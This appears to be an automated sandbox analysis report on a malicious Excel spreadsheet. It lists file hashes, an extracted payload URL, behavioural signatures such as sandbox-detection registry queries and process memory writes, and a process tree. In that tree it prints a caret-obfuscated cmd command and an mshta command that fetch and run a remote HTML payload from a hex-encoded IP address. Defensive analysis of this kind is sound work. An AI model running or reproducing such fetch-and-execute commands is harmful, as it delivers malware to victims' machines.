Analysis
- max time kernel: 139s
- max time network: 141s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 19-01-2022 15:47

Behavioral task: behavioral1
- Sample: edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
- Resource: win10-en-20211208

General
- Target: edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
- Size: 142KB
- MD5: 81f0a7a1ad8bf108c2648af767e77fcd
- SHA1: 9575d97617b4d5b9c22f5d2a0fbfbd3de1ad3de4
- SHA256: edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878
- SHA512: 6ed134fd7cba8ddd3c195f5e31a1ce996b8bc5403933a47a23666b483720eb140ca7a8ba5fda71961ef5c7125e9a5b5575f60fb57d3c48879df75bb1980c5967
Malware Config
- Extracted URL: http://0xb907d607/fer/fer.html
Signatures

- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description                                                                                          | pid  | pid_target | Process | procid_target
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2172 | 3152       | cmd.exe | 68

- Blocklisted process makes network request (1 IoC)
  Processes:
    flow | pid  | Process
    50   | 3280 | mshta.exe

- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description       | ioc                                                                          | Process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz               | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
    Key opened        | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                    | EXCEL.EXE

- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description       | ioc                                                        | Process
    Key opened        | \REGISTRY\MACHINE\Hardware\Description\System\BIOS              | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU    | EXCEL.EXE

- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid  | Process
    3152 | EXCEL.EXE

- Suspicious use of SetWindowsHookEx (13 IoCs)
  Processes:
    pid  | Process
    3152 | EXCEL.EXE (the same row is reported 13 times, one per hook installation)

- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
    description                          | pid  | Process   | procid_target
    PID 3152 wrote to memory of 3640     | 3152 | EXCEL.EXE | 72
    PID 3152 wrote to memory of 3640     | 3152 | EXCEL.EXE | 72
    PID 3152 wrote to memory of 2172     | 3152 | EXCEL.EXE | 73
    PID 3152 wrote to memory of 2172     | 3152 | EXCEL.EXE | 73
    PID 2172 wrote to memory of 3280     | 2172 | cmd.exe   | 75
    PID 2172 wrote to memory of 3280     | 2172 | cmd.exe   | 75
Processes

- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 3152, depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\splwow64.exe (PID 3640, depth 2)
    Command line: C:\Windows\splwow64.exe 12288

  - C:\Windows\SYSTEM32\cmd.exe (PID 2172, depth 2)
    Command line: cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\mshta.exe (PID 3280, depth 3)
      Command line: mshta http://0xb907d607/fer/fer.html
      - Blocklisted process makes network request